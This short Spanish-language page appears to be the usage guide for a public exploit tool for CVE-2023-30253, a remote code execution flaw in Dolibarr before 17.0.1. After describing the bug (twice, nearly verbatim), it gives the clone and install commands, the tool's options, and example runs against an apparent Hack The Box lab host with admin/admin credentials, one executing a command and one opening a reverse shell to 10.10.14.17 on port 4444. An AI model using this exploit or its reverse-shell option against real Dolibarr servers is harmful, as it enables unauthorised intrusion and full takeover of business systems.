
Dolibarr antes de 17.0.1 permite ejecución remota de código por un usuario autenticado mediante una manipulación de mayúsculas: <?PHP en lugar de <?php en datos inyectados.
Dolibarr anterior a la versión 17.0.1 permite la ejecución remota de código por parte de un usuario autenticado mediante una manipulación de mayúsculas: <?PHP en lugar de <?php en los datos inyectados.
git clone https://github.com/Rubikcuv5/cve-2023-30253.git
pip3 install -r requirements.txt
python3 CVE-2023-30253.py -h
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)
Analizador de argumentos
options:
-h, --help muestra este mensaje de ayuda y sale
--url URL URL del sitio web
-u USER, --user USER Nombre de usuario
-p PASSWORD, --password PASSWORD
Contraseña
-c COMMAND, --command COMMAND
Comando a ejecutar
-r ip port, --reverseshell ip port
IP y puerto de la shell inversa
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r 10.10.14.17 4444